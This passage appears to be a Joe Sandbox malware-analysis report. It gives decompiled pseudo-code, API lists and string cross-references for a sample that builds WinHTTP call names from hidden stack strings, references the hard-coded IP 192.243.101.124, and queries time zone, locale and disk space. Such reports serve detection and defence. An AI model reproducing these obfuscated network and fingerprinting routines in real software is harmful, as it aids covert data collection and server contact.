					 *((intOrPtr*)(_t179 - 0x20)) = 0x737265;
					 *((intOrPtr*)(__edi + 0x2c)) = GetProcAddress( *(_t179 + 0x74), _t179 - 0x30);
					 *(_t179 - 0x7c) = 0x486e6957;
					 *((intOrPtr*)(_t179 - 0x78)) = 0x41707474;
					 *((intOrPtr*)(_t179 - 0x74)) = 0x65526464;
					 *((intOrPtr*)(_t179 - 0x70)) = 0x73657571;
					 *((intOrPtr*)(_t179 - 0x6c)) = 0x61654874;
					 *((intOrPtr*)(_t179 - 0x68)) = 0x73726564;
					 *((char*)(_t179 - 0x64)) = 0;
					_t168 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x7c);
					 *(__edi + 0x30) = _t168;
					if( *__edi == 0 ||  *((intOrPtr*)(__edi + 4)) == 0 ||  *((intOrPtr*)(__edi + 8)) == 0 ||  *((intOrPtr*)(__edi + 0xc)) == 0 ||  *((intOrPtr*)(__edi + 0x10)) == 0 ||  *((intOrPtr*)(__edi + 0x18)) == 0 ||  *((intOrPtr*)(__edi + 0x1c)) == 0 ||  *((intOrPtr*)(__edi + 0x20)) == 0 ||  *((intOrPtr*)(__edi + 0x24)) == 0 ||  *((intOrPtr*)(__edi + 0x28)) == 0 ||  *((intOrPtr*)(__edi + 0x2c)) == 0 || _t168 == 0) {
						goto L14;
					} else {
						_t143 = 1;
					}
				}
				return _t143;
			}

0x012d5b63
0x012d5b70
0x012d5b73
0x012d5b7a
0x012d5b7d
0x012d5b84
0x012d5b87
0x012d5b8e
0x012d5b91
0x012d5b98
0x012d5b99
0x012d5ba0
0x012d5ba9
0x012d5baa
0x012d5bb3
0x012d5bc0
0x012d5bc2
0x012d5bc9
0x012d5bce
0x012d5ebe
0x012d5ebe
0x012d5bd4
0x012d5be0
0x012d5be7
0x012d5bee
0x012d5bf5
0x012d5bfc
0x012d5c02
0x012d5c07
0x012d5c13
0x012d5c1d
0x012d5c27
0x012d5c31
0x012d5c3b
0x012d5c45
0x012d5c4f
0x012d5c59
0x012d5c63
0x012d5c6d
0x012d5c75
0x012d5c7f
0x012d5c86
0x012d5c8d
0x012d5c94
0x012d5c9b
0x012d5ca0
0x012d5caa
0x012d5cb1
0x012d5cb8
0x012d5cbf
0x012d5cc6
0x012d5ccc
0x012d5cd1
0x012d5cdb
0x012d5ce2
0x012d5ce9
0x012d5cf0
0x012d5cf7
0x012d5cfe
0x012d5d04
0x012d5d09
0x012d5d13
0x012d5d1a
0x012d5d21
0x012d5d28
0x012d5d2e
0x012d5d33
0x012d5d3d
0x012d5d44
0x012d5d4b
0x012d5d54
0x012d5d57
0x012d5d5e
0x012d5d6c
0x012d5d73
0x012d5d7a
0x012d5d80
0x012d5d85
0x012d5d8f
0x012d5d96
0x012d5d9d
0x012d5da4
0x012d5dab
0x012d5db2
0x012d5dba
0x012d5dc4
0x012d5dcb
0x012d5dd2
0x012d5dd9
0x012d5de2
0x012d5dec
0x012d5df3
0x012d5dfa
0x012d5e01
0x012d5e08
0x012d5e0e
0x012d5e13
0x012d5e1d
0x012d5e24
0x012d5e2b
0x012d5e32
0x012d5e39
0x012d5e42
0x012d5e4c
0x012d5e53
0x012d5e5a
0x012d5e61
0x012d5e68
0x012d5e6f
0x012d5e76
0x012d5e79
0x012d5e7b
0x012d5e81
0x00000000
0x012d5eb9
0x012d5ebb
0x012d5ebb
0x012d5e81
0x012d5ec5

APIs

GetProcAddress.KERNEL32(00000000,?,192.243.101.124,00000034,?,00000200), ref: 012D5C05
GetProcAddress.KERNEL32(?,?), ref: 012D5C73
GetProcAddress.KERNEL32(?,?), ref: 012D5C9E
GetProcAddress.KERNEL32(?,?), ref: 012D5CCF
GetProcAddress.KERNEL32(?,?), ref: 012D5D07
GetProcAddress.KERNEL32(?,?), ref: 012D5D31
GetProcAddress.KERNEL32(?,?), ref: 012D5D52
GetProcAddress.KERNEL32(?,?), ref: 012D5D83
GetProcAddress.KERNEL32(?,?), ref: 012D5DB8
GetProcAddress.KERNEL32(?,?), ref: 012D5DE0
GetProcAddress.KERNEL32(?,?), ref: 012D5E11
GetProcAddress.KERNEL32(?,?), ref: 012D5E40
GetProcAddress.KERNEL32(?,?), ref: 012D5E79

Strings

Prox, xrefs: 012D5C31
ers, xrefs: 012D5E39
lose, xrefs: 012D5DFA
ttpO, xrefs: 012D5D5E
WinH, xrefs: 012D5C13
eadD, xrefs: 012D5DD2
ttpC, xrefs: 012D5DF3
WinH, xrefs: 012D5CDB
penR, xrefs: 012D5D6C
ddRe, xrefs: 012D5E5A
WinH, xrefs: 012D5D8F
ttpC, xrefs: 012D5D1A
Hand, xrefs: 012D5E01
veRe, xrefs: 012D5CF0
Head, xrefs: 012D5E32
figF, xrefs: 012D5C45
ttpS, xrefs: 012D5C86
ecei, xrefs: 012D5CE9
ttpR, xrefs: 012D5CE2
eque, xrefs: 012D5BF5
ttpG, xrefs: 012D5C1D
etTi, xrefs: 012D5CB8
ata, xrefs: 012D5DD9
meou, xrefs: 012D5CBF
WinH, xrefs: 012D5E1D
WinH, xrefs: 012D5D3D
WinH, xrefs: 012D5D57
ttpG, xrefs: 012D5D96
ttpR, xrefs: 012D5DCB
WinH, xrefs: 012D5E4C
pen, xrefs: 012D5D4B
WinH, xrefs: 012D5C7F
WinH, xrefs: 012D5BE0
ders, xrefs: 012D5E6F
WinH, xrefs: 012D5DC4
etOp, xrefs: 012D5C8D
192.243.101.124, xrefs: 012D5BD4
tHea, xrefs: 012D5E68
WinH, xrefs: 012D5D13
WinH, xrefs: 012D5CAA
ttpA, xrefs: 012D5E53
tUse, xrefs: 012D5C63
orCu, xrefs: 012D5C4F
ttpQ, xrefs: 012D5E24
ttpO, xrefs: 012D5D44
uery, xrefs: 012D5E2B
onne, xrefs: 012D5D21
ttpS, xrefs: 012D5CB1
yCon, xrefs: 012D5C3B
WinH, xrefs: 012D5DEC
orUr, xrefs: 012D5DAB
etIE, xrefs: 012D5C27
rren, xrefs: 012D5C59
eque, xrefs: 012D5D73
ques, xrefs: 012D5E61
tion, xrefs: 012D5C94
etPr, xrefs: 012D5D9D
ttpS, xrefs: 012D5BE7
oxyF, xrefs: 012D5DA4
spon, xrefs: 012D5CF7

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D3E83, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239
library

C-Code - Quality: 68%

			E012D3E83(struct HINSTANCE__* __eax, char __ebx, void* __edx, intOrPtr __edi, intOrPtr* __esi) {
				_Unknown_base(*)()* _t96;
				CHAR* _t98;
				_Unknown_base(*)()* _t100;
				short _t102;
				short _t104;
				short* _t105;
				short _t106;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t115;
				short _t116;
				short _t117;
				short _t118;
				short _t119;
				short _t120;
				short _t121;
				short _t122;
				short _t123;
				short _t124;
				short _t126;
				short _t127;
				short _t128;
				short _t129;
				short _t130;
				short _t132;
				short _t134;
				short _t135;
				short _t136;
				short _t142;
				short _t144;
				short _t145;
				short _t146;
				short _t148;
				short _t149;
				short _t150;
				short _t151;
				void* _t157;
				char _t169;
				void* _t174;
				short _t176;
				intOrPtr* _t178;
				short* _t179;
				void* _t180;

				_t178 = __esi;
				_t175 = __edi;
				_t174 = __edx;
				_t169 = __ebx;
				_t96 = GetProcAddress(__eax, ??);
				if(_t96 != 0) {
					_push(_t180 - 0x2c);
					_push(4);
					_push(__edi + 0x390);
					_push(0);
					if( *_t96() == 0) {
						 *((intOrPtr*)(__edi + 0x510)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0xc));
						E012C1667(__edi + 0x410, 0x40,  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x24)), 0xffffffff);
						_push(_t180 - 0x30);
						_push( *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x60)));
						return E013822E0( *((intOrPtr*)(_t180 - 0x2c)), __edi);
					}
				}
				_t98 = _t180 - 0x3c;
				 *((char*)(_t180 - 0x58)) = 0x47;
				 *((char*)(_t180 - 0x57)) = _t169;
				 *((intOrPtr*)(_t180 - 0x56)) = 0x636f4c74;
				 *((short*)(_t180 - 0x52)) = 0x6c61;
				 *((char*)(_t180 - 0x50)) = _t169;
				 *((intOrPtr*)(_t180 - 0x4f)) = 0x6f666e49;
				 *((short*)(_t180 - 0x4b)) = 0x57;
				_t100 = GetProcAddress(E0137C36C(), _t98);
				 *(_t180 - 8) = _t100;
				_t102 =  *(_t180 - 8)(0x400, 0x59, _t175 + 0x518, 0x10, _t98, _t180 - 0x58);
				if(_t102 == 0) {
					 *((short*)(_t175 + 0x518)) = _t102;
				}
				_t104 =  *(_t180 - 8)(0x400, 0x5a, _t175 + 0x538, 0x10);
				if(_t104 == 0) {
					 *((short*)(_t175 + 0x538)) = _t104;
				}
				 *(_t180 - 8) =  *(_t180 - 8) & 0x00000000;
				if( *((intOrPtr*)(_t180 - 0x10)) != 0) {
					_t110 = 0x53;
					 *((short*)(_t180 - 0x214)) = _t110;
					_t111 = 0x45;
					 *((short*)(_t180 - 0x212)) = _t111;
					_t112 = 0x4c;
					 *((short*)(_t180 - 0x210)) = _t112;
					_t113 = 0x45;
					 *((short*)(_t180 - 0x20e)) = _t113;
					_t114 = 0x43;
					 *((short*)(_t180 - 0x20c)) = _t114;
					_t115 = 0x54;
					 *((short*)(_t180 - 0x20a)) = _t115;
					_t116 = 0x20;
					 *((short*)(_t180 - 0x208)) = _t116;
					_t117 = 0x2a;
					 *((short*)(_t180 - 0x206)) = _t117;
					_t118 = 0x20;
					 *((short*)(_t180 - 0x204)) = _t118;
					_t119 = 0x46;
					 *((short*)(_t180 - 0x202)) = _t119;
					_t120 = 0x52;
					 *((short*)(_t180 - 0x200)) = _t120;
					_t121 = 0x4f;
					 *((short*)(_t180 - 0x1fe)) = _t121;
					_t122 = 0x4d;
					 *((short*)(_t180 - 0x1fc)) = _t122;
					_t123 = 0x20;
					 *((short*)(_t180 - 0x1fa)) = _t123;
					_t124 = 0x57;
					_t176 = 0x69;
					 *((short*)(_t180 - 0x1f8)) = _t124;
					 *((short*)(_t180 - 0x1f6)) = _t176;
					_t126 = 0x6e;
					 *((short*)(_t180 - 0x1f4)) = _t126;
					_t127 = 0x33;
					 *((short*)(_t180 - 0x1f2)) = _t127;
					_t128 = 0x32;
					 *((short*)(_t180 - 0x1f0)) = _t128;
					_t129 = 0x5f;
					 *((short*)(_t180 - 0x1ee)) = _t129;
					_t130 = 0x54;
					 *((short*)(_t180 - 0x1ec)) = _t130;
					 *((short*)(_t180 - 0x1ea)) = _t176;
					_t132 = 0x6d;
					 *((short*)(_t180 - 0x1e8)) = _t132;
					 *((short*)(_t180 - 0x1e6)) = _t169;
					_t134 = 0x5a;
					 *((short*)(_t180 - 0x1e4)) = _t134;
					_t135 = 0x6f;
					 *((short*)(_t180 - 0x1e2)) = _t135;
					_t136 = 0x6e;
					 *((short*)(_t180 - 0x1e0)) = _t136;
					 *((short*)(_t180 - 0x1de)) = _t169;
					 *((short*)(_t180 - 0x1dc)) = 0;
					 *(_t180 - 8) = E012C1195(_t174, _t176, _t178, 0x2000);
					 *_t178(_t180 - 0x28);
					_t142 = 0x44;
					 *((short*)(_t180 - 0x1b8)) = _t142;
					 *((short*)(_t180 - 0x1b6)) = _t169;
					_t144 = 0x73;
					 *((short*)(_t180 - 0x1b4)) = _t144;
					_t145 = 0x63;
					 *((short*)(_t180 - 0x1b2)) = _t145;
					_t146 = 0x72;
					 *((short*)(_t180 - 0x1b0)) = _t146;
					 *((short*)(_t180 - 0x1ae)) = _t176;
					_t148 = 0x70;
					 *((short*)(_t180 - 0x1ac)) = _t148;
					_t149 = 0x74;
					 *((short*)(_t180 - 0x1aa)) = _t149;
					_t150 = 0x6f;
					 *((short*)(_t180 - 0x1a6)) = _t150;
					_t151 = 0x6e;
					 *((short*)(_t180 - 0x1a4)) = _t151;
					 *((short*)(_t180 - 0x1a2)) = 0;
					 *((short*)(_t180 - 0x1a8)) = _t176;
					if(E012CD2FF(_t169,  *((intOrPtr*)(_t180 - 0xc)), _t178, _t180 - 0x214, _t180 - 0x1b8, _t180 - 0x28) != 0 &&  *((short*)(_t180 - 0x28)) == 8) {
						E012C1604( *(_t180 - 8), 0xfff,  *((intOrPtr*)(_t180 - 0x20)));
					}
					_t157 = _t180 - 0x28;
					_push(_t157);
					_push(_t157);
					E01356735();
					_t175 =  *((intOrPtr*)(_t180 - 4));
				}
				_t105 = E012C1195(_t174, _t175, _t178, 0xfffe);
				_t179 = _t105;
				_push(_t179);
				_push(0x7ffe);
				_push(_t105);
				_t106 = L01387B1C(_t105);
				if(_t106 == 0) {
					 *_t179 = _t106;
				}
				_push(_t180 - 0x7c);
				_push(_t180 - 0x3c);
				 *((char*)(_t180 - 0x7c)) = 0x47;
				 *((char*)(_t180 - 0x7b)) = _t169;
				 *((intOrPtr*)(_t180 - 0x7a)) = 0x73694474;
				 *((short*)(_t180 - 0x76)) = 0x466b;
				 *((char*)(_t180 - 0x74)) = 0x72;
				 *((char*)(_t180 - 0x73)) = _t169;
				 *((char*)(_t180 - 0x72)) = _t169;
				 *((intOrPtr*)(_t180 - 0x71)) = 0x63617053;
				 *((char*)(_t180 - 0x6d)) = _t169;
				 *((intOrPtr*)(_t180 - 0x6c)) = 0x577845;
				return E0132A5CA(_t180 - 0x3c);
			}

0x012d3e83
0x012d3e83
0x012d3e83
0x012d3e83
0x012d3e84
0x012d3e8c
0x012d3e91
0x012d3e92
0x012d3e9a
0x012d3e9b
0x012d3ea1
0x012d3ea9
0x012d3ec0
0x012d3ecb
0x012d3ecf
0x00000000
0x012d3ed2
0x012d3ea1
0x012d3ef6
0x012d3efa
0x012d3efe
0x012d3f01
0x012d3f08
0x012d3f0e
0x012d3f11
0x012d3f18
0x012d3f25
0x012d3f2d
0x012d3f3e
0x012d3f43
0x012d3f45
0x012d3f45
0x012d3f5c
0x012d3f61
0x012d3f63
0x012d3f63
0x012d3f6a
0x012d3f72
0x012d3f7a
0x012d3f7d
0x012d3f84
0x012d3f87
0x012d3f8e
0x012d3f91
0x012d3f98
0x012d3f9b
0x012d3fa2
0x012d3fa5
0x012d3fac
0x012d3faf
0x012d3fb6
0x012d3fb9
0x012d3fc0
0x012d3fc3
0x012d3fca
0x012d3fcd
0x012d3fd4
0x012d3fd7
0x012d3fde
0x012d3fe1
0x012d3fe8
0x012d3feb
0x012d3ff2
0x012d3ff5
0x012d3ffc
0x012d3fff
0x012d4006
0x012d4009
0x012d400c
0x012d4015
0x012d401c
0x012d401f
0x012d4026
0x012d4029
0x012d4030
0x012d4033
0x012d403a
0x012d403d
0x012d4044
0x012d4045
0x012d4050
0x012d4057
0x012d4058
0x012d4063
0x012d406a
0x012d406d
0x012d4074
0x012d4075
0x012d407e
0x012d407f
0x012d4088
0x012d4096
0x012d40a2
0x012d40aa
0x012d40ae
0x012d40af
0x012d40ba
0x012d40c1
0x012d40c4
0x012d40cb
0x012d40ce
0x012d40d5
0x012d40d6
0x012d40e1
0x012d40e8
0x012d40eb
0x012d40f2
0x012d40f3
0x012d40fc
0x012d40fd
0x012d4106
0x012d4107
0x012d4110
0x012d4128
0x012d413d
0x012d4151
0x012d4156
0x012d4159
0x012d415c
0x012d415d
0x012d415e
0x012d4163
0x012d4163
0x012d416b
0x012d4171
0x012d4173
0x012d4174
0x012d4179
0x012d417a
0x012d4181
0x012d4183
0x012d4183
0x012d4189
0x012d418d
0x012d418e
0x012d4192
0x012d4195
0x012d419c
0x012d41a2
0x012d41a6
0x012d41a9
0x012d41ac
0x012d41b3
0x012d41b6
0x012d41c2

APIs

GetProcAddress.KERNEL32 ref: 012D3E84
GetProcAddress.KERNEL32(00000000,?), ref: 012D3F25

Strings

tDis, xrefs: 012D4195
ExW, xrefs: 012D41B6
r, xrefs: 012D41A2
W, xrefs: 012D3F18
G, xrefs: 012D418E
Spac, xrefs: 012D41AC
tLoc, xrefs: 012D3F01
Info, xrefs: 012D3F11
G, xrefs: 012D3EFA
al, xrefs: 012D3F08
kF, xrefs: 012D419C

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D3ED8, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 218
library

C-Code - Quality: 83%

			E012D3ED8(void* __eax, char __ebx, void* __edx, intOrPtr __edi, intOrPtr* __esi) {
				CHAR* _t88;
				_Unknown_base(*)()* _t90;
				short _t92;
				short _t94;
				short* _t95;
				short _t96;
				short _t100;
				short _t101;
				short _t102;
				short _t103;
				short _t104;
				short _t105;
				short _t106;
				short _t107;
				short _t108;
				short _t109;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t116;
				short _t117;
				short _t118;
				short _t119;
				short _t120;
				short _t122;
				short _t124;
				short _t125;
				short _t126;
				short _t132;
				short _t134;
				short _t135;
				short _t136;
				short _t138;
				short _t139;
				short _t140;
				short _t141;
				void* _t147;
				char _t152;
				void* _t155;
				intOrPtr _t156;
				short _t157;
				intOrPtr* _t159;
				short* _t160;
				void* _t161;
				void* _t162;

				_t159 = __esi;
				_t156 = __edi;
				_t155 = __edx;
				_t152 = __ebx;
				if(__eax != 0) {
					E012C1667(__edi + 0x490, 0x40,  *((intOrPtr*)(_t161 - 0x30)), 0xffffffff);
					_t162 = _t162 + 0x10;
				}
				_t88 = _t161 - 0x3c;
				 *((char*)(_t161 - 0x58)) = 0x47;
				 *((char*)(_t161 - 0x57)) = _t152;
				 *((intOrPtr*)(_t161 - 0x56)) = 0x636f4c74;
				 *((short*)(_t161 - 0x52)) = 0x6c61;
				 *((char*)(_t161 - 0x50)) = _t152;
				 *((intOrPtr*)(_t161 - 0x4f)) = 0x6f666e49;
				 *((short*)(_t161 - 0x4b)) = 0x57;
				_t90 = GetProcAddress(E0137C36C(), _t88);
				 *(_t161 - 8) = _t90;
				_t92 =  *(_t161 - 8)(0x400, 0x59, _t156 + 0x518, 0x10, _t88, _t161 - 0x58);
				if(_t92 == 0) {
					 *((short*)(_t156 + 0x518)) = _t92;
				}
				_t94 =  *(_t161 - 8)(0x400, 0x5a, _t156 + 0x538, 0x10);
				if(_t94 == 0) {
					 *((short*)(_t156 + 0x538)) = _t94;
				}
				 *(_t161 - 8) =  *(_t161 - 8) & 0x00000000;
				if( *((intOrPtr*)(_t161 - 0x10)) != 0) {
					_t100 = 0x53;
					 *((short*)(_t161 - 0x214)) = _t100;
					_t101 = 0x45;
					 *((short*)(_t161 - 0x212)) = _t101;
					_t102 = 0x4c;
					 *((short*)(_t161 - 0x210)) = _t102;
					_t103 = 0x45;
					 *((short*)(_t161 - 0x20e)) = _t103;
					_t104 = 0x43;
					 *((short*)(_t161 - 0x20c)) = _t104;
					_t105 = 0x54;
					 *((short*)(_t161 - 0x20a)) = _t105;
					_t106 = 0x20;
					 *((short*)(_t161 - 0x208)) = _t106;
					_t107 = 0x2a;
					 *((short*)(_t161 - 0x206)) = _t107;
					_t108 = 0x20;
					 *((short*)(_t161 - 0x204)) = _t108;
					_t109 = 0x46;
					 *((short*)(_t161 - 0x202)) = _t109;
					_t110 = 0x52;
					 *((short*)(_t161 - 0x200)) = _t110;
					_t111 = 0x4f;
					 *((short*)(_t161 - 0x1fe)) = _t111;
					_t112 = 0x4d;
					 *((short*)(_t161 - 0x1fc)) = _t112;
					_t113 = 0x20;
					 *((short*)(_t161 - 0x1fa)) = _t113;
					_t114 = 0x57;
					_t157 = 0x69;
					 *((short*)(_t161 - 0x1f8)) = _t114;
					 *((short*)(_t161 - 0x1f6)) = _t157;
					_t116 = 0x6e;
					 *((short*)(_t161 - 0x1f4)) = _t116;
					_t117 = 0x33;
					 *((short*)(_t161 - 0x1f2)) = _t117;
					_t118 = 0x32;
					 *((short*)(_t161 - 0x1f0)) = _t118;
					_t119 = 0x5f;
					 *((short*)(_t161 - 0x1ee)) = _t119;
					_t120 = 0x54;
					 *((short*)(_t161 - 0x1ec)) = _t120;
					 *((short*)(_t161 - 0x1ea)) = _t157;
					_t122 = 0x6d;
					 *((short*)(_t161 - 0x1e8)) = _t122;
					 *((short*)(_t161 - 0x1e6)) = _t152;
					_t124 = 0x5a;
					 *((short*)(_t161 - 0x1e4)) = _t124;
					_t125 = 0x6f;
					 *((short*)(_t161 - 0x1e2)) = _t125;
					_t126 = 0x6e;
					 *((short*)(_t161 - 0x1e0)) = _t126;
					 *((short*)(_t161 - 0x1de)) = _t152;
					 *((short*)(_t161 - 0x1dc)) = 0;
					 *(_t161 - 8) = E012C1195(_t155, _t157, _t159, 0x2000);
					 *_t159(_t161 - 0x28);
					_t132 = 0x44;
					 *((short*)(_t161 - 0x1b8)) = _t132;
					 *((short*)(_t161 - 0x1b6)) = _t152;
					_t134 = 0x73;
					 *((short*)(_t161 - 0x1b4)) = _t134;
					_t135 = 0x63;
					 *((short*)(_t161 - 0x1b2)) = _t135;
					_t136 = 0x72;
					 *((short*)(_t161 - 0x1b0)) = _t136;
					 *((short*)(_t161 - 0x1ae)) = _t157;
					_t138 = 0x70;
					 *((short*)(_t161 - 0x1ac)) = _t138;
					_t139 = 0x74;
					 *((short*)(_t161 - 0x1aa)) = _t139;
					_t140 = 0x6f;
					 *((short*)(_t161 - 0x1a6)) = _t140;
					_t141 = 0x6e;
					 *((short*)(_t161 - 0x1a4)) = _t141;
					 *((short*)(_t161 - 0x1a2)) = 0;
					 *((short*)(_t161 - 0x1a8)) = _t157;
					if(E012CD2FF(_t152,  *((intOrPtr*)(_t161 - 0xc)), _t159, _t161 - 0x214, _t161 - 0x1b8, _t161 - 0x28) != 0 &&  *((short*)(_t161 - 0x28)) == 8) {
						E012C1604( *(_t161 - 8), 0xfff,  *((intOrPtr*)(_t161 - 0x20)));
					}
					_t147 = _t161 - 0x28;
					_push(_t147);
					_push(_t147);
					E01356735();
					_t156 =  *((intOrPtr*)(_t161 - 4));
				}
				_t95 = E012C1195(_t155, _t156, _t159, 0xfffe);
				_t160 = _t95;
				_push(_t160);
				_push(0x7ffe);
				_push(_t95);
				_t96 = L01387B1C(_t95);
				if(_t96 == 0) {
					 *_t160 = _t96;
				}
				_push(_t161 - 0x7c);
				_push(_t161 - 0x3c);
				 *((char*)(_t161 - 0x7c)) = 0x47;
				 *((char*)(_t161 - 0x7b)) = _t152;
				 *((intOrPtr*)(_t161 - 0x7a)) = 0x73694474;
				 *((short*)(_t161 - 0x76)) = 0x466b;
				 *((char*)(_t161 - 0x74)) = 0x72;
				 *((char*)(_t161 - 0x73)) = _t152;
				 *((char*)(_t161 - 0x72)) = _t152;
				 *((intOrPtr*)(_t161 - 0x71)) = 0x63617053;
				 *((char*)(_t161 - 0x6d)) = _t152;
				 *((intOrPtr*)(_t161 - 0x6c)) = 0x577845;
				return E0132A5CA(_t161 - 0x3c);
			}

0x012d3ed8
0x012d3ed8
0x012d3ed8
0x012d3ed8
0x012d3eda
0x012d3eea
0x012d3eef
0x012d3eef
0x012d3ef6
0x012d3efa
0x012d3efe
0x012d3f01
0x012d3f08
0x012d3f0e
0x012d3f11
0x012d3f18
0x012d3f25
0x012d3f2d
0x012d3f3e
0x012d3f43
0x012d3f45
0x012d3f45
0x012d3f5c
0x012d3f61
0x012d3f63
0x012d3f63
0x012d3f6a
0x012d3f72
0x012d3f7a
0x012d3f7d
0x012d3f84
0x012d3f87
0x012d3f8e
0x012d3f91
0x012d3f98
0x012d3f9b
0x012d3fa2
0x012d3fa5
0x012d3fac
0x012d3faf
0x012d3fb6
0x012d3fb9
0x012d3fc0
0x012d3fc3
0x012d3fca
0x012d3fcd
0x012d3fd4
0x012d3fd7
0x012d3fde
0x012d3fe1
0x012d3fe8
0x012d3feb
0x012d3ff2
0x012d3ff5
0x012d3ffc
0x012d3fff
0x012d4006
0x012d4009
0x012d400c
0x012d4015
0x012d401c
0x012d401f
0x012d4026
0x012d4029
0x012d4030
0x012d4033
0x012d403a
0x012d403d
0x012d4044
0x012d4045
0x012d4050
0x012d4057
0x012d4058
0x012d4063
0x012d406a
0x012d406d
0x012d4074
0x012d4075
0x012d407e
0x012d407f
0x012d4088
0x012d4096
0x012d40a2
0x012d40aa
0x012d40ae
0x012d40af
0x012d40ba
0x012d40c1
0x012d40c4
0x012d40cb
0x012d40ce
0x012d40d5
0x012d40d6
0x012d40e1
0x012d40e8
0x012d40eb
0x012d40f2
0x012d40f3
0x012d40fc
0x012d40fd
0x012d4106
0x012d4107
0x012d4110
0x012d4128
0x012d413d
0x012d4151
0x012d4156
0x012d4159
0x012d415c
0x012d415d
0x012d415e
0x012d4163
0x012d4163
0x012d416b
0x012d4171
0x012d4173
0x012d4174
0x012d4179
0x012d417a
0x012d4181
0x012d4183
0x012d4183
0x012d4189
0x012d418d
0x012d418e
0x012d4192
0x012d4195
0x012d419c
0x012d41a2
0x012d41a6
0x012d41a9
0x012d41ac
0x012d41b3
0x012d41b6
0x012d41c2

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 012D3F25

Strings

tDis, xrefs: 012D4195
ExW, xrefs: 012D41B6
r, xrefs: 012D41A2
W, xrefs: 012D3F18
G, xrefs: 012D418E
Spac, xrefs: 012D41AC
tLoc, xrefs: 012D3F01
Info, xrefs: 012D3F11
G, xrefs: 012D3EFA
al, xrefs: 012D3F08
kF, xrefs: 012D419C

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C89BC, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 137library

APIs

GetProcAddress.KERNEL32(00000000,MessageBoxW,00000000,USER32.DLL,012E3288,00000314,00000000), ref: 012C8A13
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 012C8A31
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 012C8A41
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 012C8A51
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 012C8A65

Strings

GetProcessWindowStation, xrefs: 012C8A5F
MessageBoxW, xrefs: 012C8A0D
GetUserObjectInformationW, xrefs: 012C8A46
GetActiveWindow, xrefs: 012C8A26
USER32.DLL, xrefs: 012C89F2
GetLastActivePopup, xrefs: 012C8A36

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C261A, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 151

C-Code - Quality: 62%

			E012C261A(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				char _v508;
				char _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				void* _t22;
				signed int _t23;
				short _t29;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t40;
				char _t42;
				void* _t43;
				void* _t47;
				void* _t53;
				char _t55;
				void* _t56;
				intOrPtr _t59;
				void* _t60;
				void* _t61;
				signed int _t63;
				signed int _t65;
				void* _t66;
				void* _t68;

				_t53 = __edx;
				_t63 = _t65;
				_t66 = _t65 - 0x1fc;
				_t18 =  *0x12e2aa8; // 0x5ff9d198
				_v8 = _t18 ^ _t63;
				_t59 = _a4;
				_t55 = E012C25F4(_t59);
				_t42 = 0;
				_v512 = _t55;
				if(_t55 != 0) {
					_t22 = E012C8B43(3);
					_pop(_t47);
					if(_t22 == 1) {
						L16:
						_push(0xfffffff4);
						_push(_t47);
						_t61 = E01304862(_t22, __eflags);
						__eflags = _t61 - _t42;
						if(_t61 != _t42) {
							__eflags = _t61 - 0xffffffff;
							if(_t61 != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								while(1) {
									 *((char*)(_t63 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t55 + _t23 * 2));
									__eflags =  *((intOrPtr*)(_t55 + _t23 * 2)) - _t42;
